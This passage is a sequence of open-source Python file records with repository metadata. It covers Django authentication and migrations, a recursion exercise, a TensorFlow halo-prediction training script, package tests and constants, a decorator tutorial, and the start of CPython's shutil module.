bba941cbd7a031aba596f35b0cd5f58040fc39ac | 9d35f59c102236581e010e24ae39dd4a1c876aca | /fbauth/managers.py | f818d969d504b5fb08a0ddfbddc0c210e9ea6709 | [
"MIT"
] | permissive | Tuss4/django-fb-oauth | 195d30f19b7fa3b43cf1b337c2178fffb1c4a7ef | 9098ab3ea77e7695affd5c793c35d05ae61b1cdb | refs/heads/master | 2021-07-17T17:30:09.435330 | 2016-02-07T08:02:45 | 2016-02-07T08:02:45 | 51,091,583 | 2 | 0 | MIT | 2021-06-10T18:27:59 | 2016-02-04T17:10:42 | Python | UTF-8 | Python | false | false | 408 | py | from django.db import models
from django.contrib.auth import get_user_model
class FBManager(models.Manager):
"""Manager method to create a Facebook User"""
def create_fb_user(self, fb_id, token, **kwargs):
user = get_user_model().objects.create_user(**kwargs)
fbt = self.model(user=user, facebook_id=fb_id, access_token=token)
fbt.save(using=self._db)
return user
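# Usage sketch (illustrative; assumes a model wired up as
# `objects = FBManager()` with `user`, `facebook_id` and `access_token`
# fields; the model name below is a guess, not the app's actual model):
#   user = FBToken.objects.create_fb_user(
#       fb_id="12345", token="EAAB...",
#       username="jane", password="s3cret")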
| [
"[email protected]"
] | |
3b7113ec2fe7f30d44c4a0e4f1c9e0a04ee4f474 | 360e1f69f4c0923c5d79bc82aa33c0fd4e80b71e | /RECURSION/subsets.py | f334469a9f4ddc3cb74e3afb1d219f81e37a0ac4 | [] | no_license | Vijay1234-coder/data_structure_plmsolving | 04e52fe6c918313e13d39107a2ded8b47645bb12 | d449b266295d1ae55613cdcfd9b22ad9cee3dfbe | refs/heads/master | 2023-08-01T00:55:28.825972 | 2021-09-12T15:20:12 | 2021-09-12T15:20:12 | 387,782,783 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | def subSets(arr,index,sub):
    if index == len(arr):
        if len(sub) != 0:
            print(sub)
        return sub
    subSets(arr, index+1, sub)                  # branch that excludes arr[index]
    subSets(arr, index+1, sub + [arr[index]])   # branch that includes arr[index]
    return sub
arr = [1,2,3]
n = len(arr)
subSets(arr, 0, [])
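# With the base-case return fixed above, this prints the 7 non-empty subsets
# of [1, 2, 3] (2**3 - 1 of them). `sub + [arr[index]]` builds a fresh list
# for each branch, so no backtracking/undo step is needed.
| [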
"[email protected]"
] | |
016c0b20397a06625c09871ea2375ffd3f6a0c97 | dfe2a52a1c36a28a8bf85af7efd42380d980b773 | /virtual/lib/python3.6/site-packages/registration/migrations/0001_initial.py | 5c56041a6ca8b00eff3ae7668f2cfc0281c5d363 | [
"MIT"
] | permissive | virginiah894/Instagram-clone | 2c2a15d89fcdb25b22bd60428cf84a01f3bd553c | 4d8abe7bafefae06a0e462e6a47631c2f8a1d361 | refs/heads/master | 2022-12-10T06:56:21.105357 | 2020-01-07T14:14:50 | 2020-01-07T14:14:50 | 229,394,540 | 3 | 0 | MIT | 2022-12-08T03:23:40 | 2019-12-21T07:41:19 | Python | UTF-8 | Python | false | false | 1,159 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='RegistrationProfile',
fields=[
('id',
models.AutoField(
primary_key=True,
serialize=False,
auto_created=True,
verbose_name='ID')),
('activation_key',
models.CharField(
verbose_name='activation key',
max_length=40)),
('user',
models.OneToOneField(
to=settings.AUTH_USER_MODEL,
verbose_name='user',
on_delete=models.CASCADE)),
],
options={
'verbose_name': 'registration profile',
'verbose_name_plural': 'registration profiles',
},
),
]
| [
"[email protected]"
] | |
acfa5f0d183bd41ee79f4a9b874cb03788f3ca7c | 5d605697cd6bb493250718232d9e95c69f624103 | /code/train-est-mod-var/halo_unet.py | 7a248e48f709272bc78904f415e5b29854edcbf6 | [
"MIT"
] | permissive | modichirag/galmodel | 738a257e3fad89efd0f5698077c0c0ae67a99145 | d3243b8f2f51d558255346a37f2bda2f83274e3d | refs/heads/master | 2020-04-05T14:19:51.838549 | 2019-09-25T05:08:49 | 2019-09-25T05:08:49 | 156,924,087 | 4 | 1 | MIT | 2019-09-25T05:08:53 | 2018-11-09T22:17:24 | Jupyter Notebook | UTF-8 | Python | false | false | 12,405 | py | import numpy as np
import matplotlib.pyplot as plt
#
import sys, os
sys.path.append('../utils/')
import tools
import datatools as dtools
from time import time
os.environ["CUDA_VISIBLE_DEVICES"]="0"
#
import tensorflow as tf
from tensorflow.contrib.slim import add_arg_scope
from layers import wide_resnet
import tensorflow_hub as hub
import models
import logging
from datetime import datetime
#############################
seed_in = 3
from numpy.random import seed
seed(seed_in)
from tensorflow import set_random_seed
set_random_seed(seed_in)
bs = 400
nc, ncf = 128, 512
step, stepf = 5, 40
path = '../../data/z00/'
ftype = 'L%04d_N%04d_S%04d_%02dstep/'
ftypefpm = 'L%04d_N%04d_S%04d_%02dstep_fpm/'
numd = 1e-3
num = int(numd*bs**3)
R1 = 3
R2 = 3*1.2
kny = np.pi*nc/bs
kk = tools.fftk((nc, nc, nc), bs)
#seeds = [100]
seeds = [100, 200, 300, 400]
vseeds = [800, 900]
#############################
pad = int(0)
nsub = 2
fsize = 8
suff = 'pad0-unet-nsub2'
#fname = open('../models/n10/README', 'a+', 1)
#fname.write('%s \t :\n\tModel to predict halo position likelihood in halo_logistic with data supplemented by size=8, 16, 32, 64, 128; rotation with probability=0.5 and padding the mesh with 2 cells. Also reduce learning rate in piecewise constant manner. n_y=1 and high of quntized distribution to 3. Init field as 1 feature & high learning rate\n'%suff)
#fname.close()
savepath = '../modelsv2/n10/%s/'%suff
try : os.makedirs(savepath)
except: pass
fname = open(savepath + 'log', 'w+', 1)
#fname = None
num_cubes = 500
cube_sizes = np.array([16, 32, 64, 128]).astype(int)
nsizes = len(cube_sizes)
cube_sizesft = (cube_sizes + 2*pad).astype(int)
max_offset = nc - cube_sizes
ftname = ['cic']
tgname = ['pnn']
nchannels = len(ftname)
ntargets = len(tgname)
batch_size=64
rprob = 0.5
print('Features are ', ftname, file=fname)
print('Pad with ', pad, file=fname)
print('Rotation probability = %0.2f'%rprob, file=fname)
fname.close()
#############################
##Read data and generate meshes
def get_meshes(seed, galaxies=False):
mesh = {}
mesh['s'] = tools.readbigfile(path + ftypefpm%(bs, nc, seed, step) + 'mesh/s/')
partp = tools.readbigfile(path + ftypefpm%(bs, nc, seed, step) + 'dynamic/1/Position/')
mesh['cic'] = tools.paintcic(partp, bs, nc)
mesh['decic'] = tools.decic(mesh['cic'], kk, kny)
mesh['R1'] = tools.fingauss(mesh['cic'], kk, R1, kny)
mesh['R2'] = tools.fingauss(mesh['cic'], kk, R2, kny)
mesh['GD'] = mesh['R1'] - mesh['R2']
hmesh = {}
hposall = tools.readbigfile(path + ftype%(bs, ncf, seed, stepf) + 'FOF/PeakPosition/')[1:]
massall = tools.readbigfile(path + ftype%(bs, ncf, seed, stepf) + 'FOF/Mass/')[1:].reshape(-1)*1e10
hposd = hposall[:num].copy()
massd = massall[:num].copy()
hmesh['pcic'] = tools.paintcic(hposd, bs, nc)
hmesh['pnn'] = tools.paintnn(hposd, bs, nc)
hmesh['pnnsm'] = tools.fingauss(hmesh['pnn'], kk, R1, kny)
hmesh['mnn'] = tools.paintnn(hposd, bs, nc, massd)
# mesh['hd'] = hmesh['pcic'].copy()
# mesh['hd'] /= mesh['hd'].mean()
# mesh['hd'] -= 1
#
return mesh, hmesh
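# get_meshes() returns two dicts per seed: `mesh` carries the matter-field
# features (the CIC-painted density plus its deconvolved and Gaussian-smoothed
# variants), while `hmesh` carries the halo targets painted on the same grid
# (CIC/NN position fields, a smoothed NN field, and an NN mass field).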
def generate_training_data():
meshes = {}
cube_features, cube_target = [[] for i in range(len(cube_sizes))], [[] for i in range(len(cube_sizes))]
for seed in seeds:
mesh, hmesh = get_meshes(seed)
meshes[seed] = [mesh, hmesh]
        print('All the meshes have been generated for seed = %d'%seed)
#Create training voxels
ftlist = [mesh[i].copy() for i in ftname]
ftlistpad = [np.pad(i, pad, 'wrap') for i in ftlist]
targetmesh = [hmesh[i].copy() for i in tgname]
for i, size in enumerate(cube_sizes):
print('For size = ', size)
if size==nc:
features = [np.stack(ftlistpad, axis=-1)]
target = [np.stack(targetmesh, axis=-1)]
else:
numcubes = int(num_cubes/size*4)
features, target = dtools.randomvoxels(ftlistpad, targetmesh, numcubes, max_offset[i],
size, cube_sizesft[i], seed=seed, rprob=0)
cube_features[i] = cube_features[i] + features
cube_target[i] = cube_target[i] + target
for i in range(cube_sizes.size):
cube_target[i] = np.stack(cube_target[i],axis=0)
cube_features[i] = np.stack(cube_features[i],axis=0)
print(cube_features[i].shape, cube_target[i].shape)
return meshes, cube_features, cube_target
#############################
class MDNEstimator(tf.estimator.Estimator):
"""An estimator for distribution estimation using Mixture Density Networks.
"""
def __init__(self,
n_y,
n_mixture,
optimizer=tf.train.AdamOptimizer,
dropout=None,
model_dir=None,
config=None):
"""Initializes a `MDNEstimator` instance.
"""
def _model_fn(features, labels, mode):
return models._mdn_unetmodel_fn(features, labels,
nchannels, n_y, n_mixture, dropout,
optimizer, mode, pad=pad, fsize=fsize, nsub=nsub, distribution='logistic')
super(self.__class__, self).__init__(model_fn=_model_fn,
model_dir=model_dir,
config=config)
def mapping_function(inds):
def extract_batch(inds):
isize = np.random.choice(len(cube_sizes), 1, replace=True)[0]
batch = int(batch_size*8/cube_sizes[isize])
if cube_sizes[isize]==nc : batch = 1
inds = inds[:batch]
trainingsize = cube_features[isize].shape[0]
inds[inds >= trainingsize] = (inds[inds >= trainingsize])%trainingsize
features = cube_features[isize][inds].astype('float32')
targets = cube_target[isize][inds].astype('float32')
for i in range(batch):
nrotations=0
while (np.random.random() < rprob) & (nrotations < 3):
nrot, ax0, ax1 = np.random.randint(0, 3), *np.random.permutation((0, 1, 2))[:2]
features[i] = np.rot90(features[i], nrot, (ax0, ax1))
targets[i] = np.rot90(targets[i], nrot, (ax0, ax1))
nrotations +=1
# # print(isize, i, nrotations, targets[i].shape)
# # print(inds)
return features, targets
ft, tg = tf.py_func(extract_batch, [inds],
[tf.float32, tf.float32])
return ft, tg
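# Caveat: tf.py_func returns tensors with no static shape information, so
# everything downstream of this map sees unknown-rank inputs; the model_fn is
# assumed to tolerate that (or to restore shapes itself via set_shape).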
def training_input_fn():
"""Serving input fn for training data"""
dataset = tf.data.Dataset.range(len(np.array(cube_features)[0]))
dataset = dataset.repeat().shuffle(1000).batch(batch_size)
dataset = dataset.map(mapping_function)
dataset = dataset.prefetch(16)
return dataset
def testing_input_fn():
"""Serving input fn for testing data"""
dataset = tf.data.Dataset.range(len(cube_features))
dataset = dataset.batch(16)
dataset = dataset.map(mapping_function)
return dataset
#############################################################################
###save
def save_module(model, savepath, max_steps):
print('\nSave module\n')
features = tf.placeholder(tf.float32, shape=[None, None, None, None, nchannels], name='input')
labels = tf.placeholder(tf.float32, shape=[None, None, None, None, ntargets], name='labels')
exporter = hub.LatestModuleExporter("tf_hub", tf.estimator.export.build_raw_serving_input_receiver_fn({'features':features, 'labels':labels},
default_batch_size=None))
modpath = exporter.export(model, savepath + 'module', model.latest_checkpoint())
modpath = modpath.decode("utf-8")
check_module(modpath)
#####
def check_module(modpath):
print('\nTest module\n')
tf.reset_default_graph()
module = hub.Module(modpath + '/likelihood/')
xx = tf.placeholder(tf.float32, shape=[None, None, None, None, nchannels], name='input')
yy = tf.placeholder(tf.float32, shape=[None, None, None, None, ntargets], name='labels')
samples = module(dict(features=xx, labels=yy), as_dict=True)['sample']
loglik = module(dict(features=xx, labels=yy), as_dict=True)['loglikelihood']
preds = {}
with tf.Session() as sess:
sess.run(tf.initializers.global_variables())
for seed in vseeds:
xxm = np.stack([np.pad(vmeshes[seed][0][i], pad, 'wrap') for i in ftname], axis=-1)
#yym = np.stack([np.pad(vmeshes[seed][1]['pnncen'], pad, 'wrap'), np.pad(vmeshes[seed][1]['pnnsat'], pad, 'wrap')], axis=-1)
yym = np.stack([vmeshes[seed][1][i] for i in tgname], axis=-1)
print('xxm, yym shape = ', xxm.shape, yym.shape)
preds[seed] = sess.run(samples, feed_dict={xx:np.expand_dims(xxm, 0), yy:np.expand_dims(yym, 0)})
vmeshes[seed][0]['predict'] = np.squeeze(preds[seed])
##############################
##Power spectrum
shape = [nc,nc,nc]
kk = tools.fftk(shape, bs)
kmesh = sum(i**2 for i in kk)**0.5
fig, axar = plt.subplots(2, 2, figsize = (8, 8))
ax = axar[0]
for seed in vseeds:
for i, key in enumerate(['']):
predict, hpmeshd = vmeshes[seed][0]['predict%s'%key] , vmeshes[seed][1]['pnn%s'%key],
k, pkpred = tools.power(predict/predict.mean(), boxsize=bs, k=kmesh)
k, pkhd = tools.power(hpmeshd/hpmeshd.mean(), boxsize=bs, k=kmesh)
k, pkhx = tools.power(hpmeshd/hpmeshd.mean(), predict/predict.mean(), boxsize=bs, k=kmesh)
##
ax[0].semilogx(k[1:], pkpred[1:]/pkhd[1:], label=seed)
ax[1].semilogx(k[1:], pkhx[1:]/(pkpred[1:]*pkhd[1:])**0.5)
ax[0].set_title(key, fontsize=12)
for axis in ax.flatten():
axis.legend(fontsize=14)
axis.set_yticks(np.arange(0, 1.2, 0.1))
axis.grid(which='both')
axis.set_ylim(0.,1.1)
ax[0].set_ylabel('Transfer function', fontsize=14)
ax[1].set_ylabel('Cross correlation', fontsize=14)
#
ax = axar[1]
for i, key in enumerate([ '']):
predict, hpmeshd = vmeshes[seed][0]['predict%s'%key] , vmeshes[seed][1]['pnn%s'%key],
vmin, vmax = 0, (hpmeshd[:, :, :].sum(axis=0)).max()
im = ax[0].imshow(predict[:, :, :].sum(axis=0), vmin=vmin, vmax=vmax)
im = ax[1].imshow(hpmeshd[:, :, :].sum(axis=0), vmin=vmin, vmax=vmax)
ax[0].set_title(key, fontsize=15)
ax[0].set_title('Prediction', fontsize=15)
ax[1].set_title('Truth', fontsize=15)
plt.savefig(savepath + '/vpredict%d.png'%max_steps)
plt.show()
#
############################################################################
#############---------MAIN---------################
meshes, cube_features, cube_target = generate_training_data()
vmeshes = {}
for seed in vseeds: vmeshes[seed] = get_meshes(seed)
# get TF logger
log = logging.getLogger('tensorflow')
log.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# create file handler which logs even debug messages
try: os.makedirs(savepath + '/logs/')
except: pass
logfile = datetime.now().strftime('logs/tflogfile_%H_%M_%d_%m_%Y.log')
fh = logging.FileHandler(savepath + logfile)
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
log.addHandler(fh)
for max_steps in [50, 100, 1000, 3000, 5000, 10000, 15000, 20000, 25000, 30000, 35000,
40000, 45000, 50000, 55000, 60000, 70000]:
#for max_steps in [100]+list(np.arange(5e3, 7.1e4, 5e3, dtype=int)):
print('For max_steps = ', max_steps)
tf.reset_default_graph()
run_config = tf.estimator.RunConfig(save_checkpoints_steps = 2000)
model = MDNEstimator(n_y=ntargets, n_mixture=8, dropout=0.95,
model_dir=savepath + 'model', config = run_config)
model.train(training_input_fn, max_steps=max_steps)
f = open(savepath + 'model/checkpoint')
lastpoint = int(f.readline().split('-')[-1][:-2])
f.close()
if lastpoint > max_steps:
print('Don"t save')
print(lastpoint)
else:
print("Have to save")
save_module(model, savepath, max_steps)
| [
"[email protected]"
] | |
e89bf19c8f53855bfc3e1277c31a3391c13eeba9 | 33621e000244ef274de9f4da3f1afc83a130414f | /tests/test_version.py | 231a11632b4ac9665f625fd51b51dbfbda2a92cb | [
"MIT"
] | permissive | pombredanne/i18nspector | 8901b7dd39b2a9e662edd0870906bbe683ba1960 | abf543ccad9034e6278af0ba1bb6a384193c799b | refs/heads/master | 2021-01-19T20:09:06.069438 | 2017-07-04T08:26:38 | 2017-07-04T08:26:38 | 83,740,280 | 0 | 0 | null | 2017-07-04T08:26:39 | 2017-03-03T00:50:28 | Python | UTF-8 | Python | false | false | 1,911 | py | # Copyright © 2012-2013 Jakub Wilk <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
from nose.tools import (
assert_equal,
)
from lib.cli import __version__
here = os.path.dirname(__file__)
docdir = os.path.join(here, os.pardir, 'doc')
def test_changelog():
path = os.path.join(docdir, 'changelog')
with open(path, 'rt', encoding='UTF-8') as file:
line = file.readline()
changelog_version = line.split()[1].strip('()')
assert_equal(changelog_version, __version__)
def test_manpage():
path = os.path.join(docdir, 'i18nspector.txt')
manpage_version = None
with open(path, 'rt', encoding='UTF-8') as file:
for line in file:
if line.startswith(':version:'):
manpage_version = line.split()[-1]
break
assert_equal(manpage_version, __version__)
# vim:ts=4 sts=4 sw=4 et
| [
"[email protected]"
] | |
8e281a5b517d5197c5e02452a34be7e31c26bc61 | 5191423bc86a4e56845c737b4ce6853f3faef90e | /pytautulli/const.py | 705a83cdab7eff5546a0fac20c880319ed7c337e | [
"MIT"
] | permissive | ludeeus/pytautulli | 075d354d03a50dab0ffb7d9425bb4015c1ff443d | 0cf5b826c2033882b582287bbd0056d81a30065f | refs/heads/main | 2023-04-09T15:51:02.346720 | 2023-02-04T14:35:39 | 2023-02-04T14:35:39 | 141,796,012 | 2 | 5 | MIT | 2023-03-29T06:59:02 | 2018-07-21T08:46:33 | Python | UTF-8 | Python | false | false | 374 | py | """Pytautulli constants."""
from enum import Enum
from logging import Logger, getLogger
API_HEADERS = {"Content-Type": "application/json"}
LOGGER: Logger = getLogger(__package__)
ATTR_RESPONSE = "response"
ATTR_DATA = "data"
class HTTPMethod(Enum):
"""HTTPMethod Enum."""
GET = "GET"
POST = "POST"
PUT = "PUT"
DELETE = "DELETE"
PATCH = "PATCH"
| [
"[email protected]"
] | |
945cbd4408c837958ac33a2794a1fa4bf98b2e3e | 0a3c85ca1388a6e9935509a0488f4027f40986f8 | /tests/issues/test_477.py | db9dd56244047b7eaa042b6be812e4e239298667 | [
"Apache-2.0"
] | permissive | langitem/hgvs | cbf4c9f22f4e8bd0523a8948e63b3bc95599c7ff | 0dac443b9dc565c7fdca5a4b8de40b3fea7624f4 | refs/heads/master | 2020-04-18T00:37:30.157853 | 2019-02-25T19:24:59 | 2019-02-25T19:24:59 | 167,084,812 | 0 | 0 | Apache-2.0 | 2019-02-16T01:57:14 | 2019-01-22T23:42:34 | Python | UTF-8 | Python | false | false | 3,213 | py | import pytest
from hgvs.exceptions import HGVSInvalidIntervalError
tests = (
# {"c": "", "g": "", "rs": "" },
# GPHB5, GRCh37 https://www.ncbi.nlm.nih.gov/gene/122876
{"c": "NM_145171.3:c.-63A>G", "g": "NC_000014.8:g.63785599T>C", "rs": "GPHB5/GRCh37/rs1299953722", "ex": HGVSInvalidIntervalError },
{"c": "NM_145171.3:c.-56G>A", "g": "NC_000014.8:g.63785592C>T", "rs": "GPHB5/GRCh37/rs982881702" },
{"c": "NM_145171.3:c.2T>C", "g": "NC_000014.8:g.63784562A>G", "rs": "GPHB5/GRCh37/rs1221379530" },
{"c": "NM_145171.3:c.388A>G", "g": "NC_000014.8:g.63779647T>C", "rs": "GPHB5/GRCh37/rs1380832691" },
{"c": "NM_145171.3:c.*4C>T", "g": "NC_000014.8:g.63779638G>A", "rs": "GPHB5/GRCh37/rs753041439" },
{"c": "NM_145171.3:c.*84A>G", "g": "NC_000014.8:g.63779558T>C", "rs": "GPHB5/GRCh37/rs1204774077" },
{"c": "NM_145171.3:c.*99G>A", "g": "NC_000014.8:g.63779543C>T", "rs": "GPHB5/GRCh37/rs144659601", "ex": HGVSInvalidIntervalError },
# GPHB5, GRCh37 https://www.ncbi.nlm.nih.gov/gene/122876
{"c": "NM_145171.3:c.-63A>G", "g": "NC_000014.9:g.63318885T>C", "rs": "GPHB5/GRCh38/rs1299953722", "ex": HGVSInvalidIntervalError },
{"c": "NM_145171.3:c.-56G>A", "g": "NC_000014.9:g.63318878C>T", "rs": "GPHB5/GRCh38/rs982881702" },
{"c": "NM_145171.3:c.2T>C", "g": "NC_000014.9:g.63317848A>G", "rs": "GPHB5/GRCh38/rs1221379530" },
{"c": "NM_145171.3:c.388A>G", "g": "NC_000014.9:g.63312933T>C", "rs": "GPHB5/GRCh38/rs1380832691" },
{"c": "NM_145171.3:c.*4C>T", "g": "NC_000014.9:g.63312924G>A", "rs": "GPHB5/GRCh38/rs753041439" },
{"c": "NM_145171.3:c.*84A>G", "g": "NC_000014.9:g.63312844T>C", "rs": "GPHB5/GRCh38/rs1204774077" },
{"c": "NM_145171.3:c.*99G>A", "g": "NC_000014.9:g.63312829C>T", "rs": "GPHB5/GRCh38/rs144659601", "ex": HGVSInvalidIntervalError },
# COX6A2 https://www.ncbi.nlm.nih.gov/gene/1339
{"c": "NM_005205.3:c.-106G>A", "g": "NC_000016.10:g.31428431C>T", "rs": "COX6A2/GRCh38/rs1033792906", "ex": HGVSInvalidIntervalError },
{"c": "NM_005205.3:c.-96C>T", "g": "NC_000016.10:g.31428421G>A", "rs": "COX6A2/GRCh38/rs755670336" },
{"c": "NM_005205.3:c.2T>C", "g": "NC_000016.10:g.31428324A>G", "rs": "COX6A2/GRCh38/rs200780049" },
{"c": "NM_005205.3:c.293G>A", "g": "NC_000016.10:g.31427775C>T", "rs": "COX6A2/GRCh38/rs764753905" },
{"c": "NM_005205.3:c.*3C>T", "g": "NC_000016.10:g.31427771G>A", "rs": "COX6A2/GRCh38/rs909673485" },
{"c": "NM_005205.3:c.*42G>C", "g": "NC_000016.10:g.31427732C>G", "rs": "COX6A2/GRCh38/rs375688325" },
{"c": "NM_005205.3:c.*43A>G", "g": "NC_000016.10:g.31427731T>C", "rs": "COX6A2/GRCh38/rs961248971" },
{"c": "NM_005205.3:c.*44G>A", "g": "NC_000016.10:g.31427730C>T", "rs": "COX6A2/GRCh38/rs756406653", "ex": HGVSInvalidIntervalError },
)
@pytest.mark.parametrize("pair", tests, ids=[p["rs"] for p in tests])
def test_pair(parser, am38, pair):
var_c = parser.parse(pair["c"])
var_g = parser.parse(pair["g"])
if "ex" in pair:
with pytest.raises(pair["ex"]):
var_gtoc = am38.g_to_c(var_g, var_c.ac)
else:
var_gtoc = am38.g_to_c(var_g, var_c.ac)
assert pair["c"] == str(var_gtoc)
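# Note: the `parser` and `am38` fixtures are assumed to be provided by the
# project's conftest.py (an hgvs Parser and a GRCh38 AssemblyMapper).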
| [
"[email protected]"
] | |
3588bec4261cc0eb788f5aa02ad1e5db0f2d19ec | db9b3be76bb5502d0b11a23ee829efbe328d68b2 | /python/decoretors/actual decorator/using_decorator.py | c32ca1660ad581167ad793785de47c1c3cd8ed78 | [] | no_license | NARESHSWAMI199/python | 2cdf240a8610815b4fb64fcb3e8beeafd3191aab | 4896345ea2af623c76b06083bcfb38d90f318c88 | refs/heads/master | 2020-12-01T16:47:49.974094 | 2019-12-29T04:32:03 | 2019-12-29T04:32:03 | 230,702,606 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 881 | py |
from functools import wraps
def decorator(func):
    @wraps(func)
    def wrapper(*args, **kwargs):  # *args collects the positional arguments as a tuple
        '''this is the wrapper function'''
        print("this is an awesome function")
        return func(*args, **kwargs)
        # use return here because the wrapped function may itself return a value
    # how the decorator works:
    # func = decorator(func)  # the decorator is called with func and returns the
    # wrapper under the original name, so calling func() now calls wrapper()
    return wrapper
@decorator
def add(a,b):
'''this is add function'''
return a+b
print(add(2,3))
# if you check the name of the add function and print its docstring, without
# @wraps you would get the wrapper's name and docstring instead; importing
# wraps from functools fixes this
print(add.__doc__)
print(add.__name__)
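# Expected output, with @wraps in place:
#   this is an awesome function
#   5
#   this is add function
#   add
| [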
"[email protected]"
] | |
b7327ec48991201cec6ef1c2fe84990ae5ce6d4e | 709b56d4b045d9dc671a922bf95e4477def3aa51 | /Python-3.8.7/Lib/shutil.py | 6986bce8aaee2d30a7a4a8b1b397f4ac15a8738e | [
"MIT",
"GPL-1.0-or-later",
"Python-2.0",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"0BSD",
"LicenseRef-scancode-free-unknown"
] | permissive | Gizmotronn/django-start | 1240ba3e3050f618364654e53a0f69f65c5c1f52 | f2046e04655d9040f4a55f3c771f87e323e33313 | refs/heads/master | 2023-03-19T12:23:19.980979 | 2021-01-28T22:08:30 | 2021-01-28T22:08:30 | 274,297,608 | 4 | 2 | MIT | 2021-03-20T05:50:25 | 2020-06-23T03:16:15 | Python | UTF-8 | Python | false | false | 50,924 | py | """Utility functions for copying and archiving files and directory trees.
XXX The functions here don't copy the resource fork or other metadata on Mac.
"""
import os
import sys
import stat
import fnmatch
import collections
import errno
try:
import zlib
del zlib
_ZLIB_SUPPORTED = True
except ImportError:
_ZLIB_SUPPORTED = False
try:
import bz2
del bz2
_BZ2_SUPPORTED = True
except ImportError:
_BZ2_SUPPORTED = False
try:
import lzma
del lzma
_LZMA_SUPPORTED = True
except ImportError:
_LZMA_SUPPORTED = False
try:
from pwd import getpwnam
except ImportError:
getpwnam = None
try:
from grp import getgrnam
except ImportError:
getgrnam = None
_WINDOWS = os.name == 'nt'
posix = nt = None
if os.name == 'posix':
import posix
elif _WINDOWS:
import nt
COPY_BUFSIZE = 1024 * 1024 if _WINDOWS else 64 * 1024
_USE_CP_SENDFILE = hasattr(os, "sendfile") and sys.platform.startswith("linux")
_HAS_FCOPYFILE = posix and hasattr(posix, "_fcopyfile") # macOS
# CMD defaults in Windows 10
_WIN_DEFAULT_PATHEXT = ".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC"
__all__ = ["copyfileobj", "copyfile", "copymode", "copystat", "copy", "copy2",
"copytree", "move", "rmtree", "Error", "SpecialFileError",
"ExecError", "make_archive", "get_archive_formats",
"register_archive_format", "unregister_archive_format",
"get_unpack_formats", "register_unpack_format",
"unregister_unpack_format", "unpack_archive",
"ignore_patterns", "chown", "which", "get_terminal_size",
"SameFileError"]
# disk_usage is added later, if available on the platform
class Error(OSError):
pass
class SameFileError(Error):
"""Raised when source and destination are the same file."""
class SpecialFileError(OSError):
"""Raised when trying to do a kind of operation (e.g. copying) which is
not supported on a special file (e.g. a named pipe)"""
class ExecError(OSError):
"""Raised when a command could not be executed"""
class ReadError(OSError):
"""Raised when an archive cannot be read"""
class RegistryError(Exception):
"""Raised when a registry operation with the archiving
and unpacking registries fails"""
class _GiveupOnFastCopy(Exception):
"""Raised as a signal to fallback on using raw read()/write()
file copy when fast-copy functions fail to do so.
"""
def _fastcopy_fcopyfile(fsrc, fdst, flags):
"""Copy a regular file content or metadata by using high-performance
fcopyfile(3) syscall (macOS).
"""
try:
infd = fsrc.fileno()
outfd = fdst.fileno()
except Exception as err:
raise _GiveupOnFastCopy(err) # not a regular file
try:
posix._fcopyfile(infd, outfd, flags)
except OSError as err:
err.filename = fsrc.name
err.filename2 = fdst.name
if err.errno in {errno.EINVAL, errno.ENOTSUP}:
raise _GiveupOnFastCopy(err)
else:
raise err from None
def _fastcopy_sendfile(fsrc, fdst):
"""Copy data from one regular mmap-like fd to another by using
high-performance sendfile(2) syscall.
This should work on Linux >= 2.6.33 only.
"""
# Note: copyfileobj() is left alone in order to not introduce any
# unexpected breakage. Possible risks by using zero-copy calls
# in copyfileobj() are:
# - fdst cannot be open in "a"(ppend) mode
# - fsrc and fdst may be open in "t"(ext) mode
# - fsrc may be a BufferedReader (which hides unread data in a buffer),
# GzipFile (which decompresses data), HTTPResponse (which decodes
# chunks).
# - possibly others (e.g. encrypted fs/partition?)
global _USE_CP_SENDFILE
try:
infd = fsrc.fileno()
outfd = fdst.fileno()
except Exception as err:
raise _GiveupOnFastCopy(err) # not a regular file
# Hopefully the whole file will be copied in a single call.
# sendfile() is called in a loop 'till EOF is reached (0 return)
# so a bufsize smaller or bigger than the actual file size
# should not make any difference, also in case the file content
# changes while being copied.
try:
blocksize = max(os.fstat(infd).st_size, 2 ** 23) # min 8MiB
except OSError:
blocksize = 2 ** 27 # 128MiB
# On 32-bit architectures truncate to 1GiB to avoid OverflowError,
# see bpo-38319.
if sys.maxsize < 2 ** 32:
blocksize = min(blocksize, 2 ** 30)
offset = 0
while True:
try:
sent = os.sendfile(outfd, infd, offset, blocksize)
except OSError as err:
            # ...in order to have a more informative exception.
err.filename = fsrc.name
err.filename2 = fdst.name
if err.errno == errno.ENOTSOCK:
# sendfile() on this platform (probably Linux < 2.6.33)
# does not support copies between regular files (only
# sockets).
_USE_CP_SENDFILE = False
raise _GiveupOnFastCopy(err)
if err.errno == errno.ENOSPC: # filesystem is full
raise err from None
# Give up on first call and if no data was copied.
if offset == 0 and os.lseek(outfd, 0, os.SEEK_CUR) == 0:
raise _GiveupOnFastCopy(err)
raise err
else:
if sent == 0:
break # EOF
offset += sent
def _copyfileobj_readinto(fsrc, fdst, length=COPY_BUFSIZE):
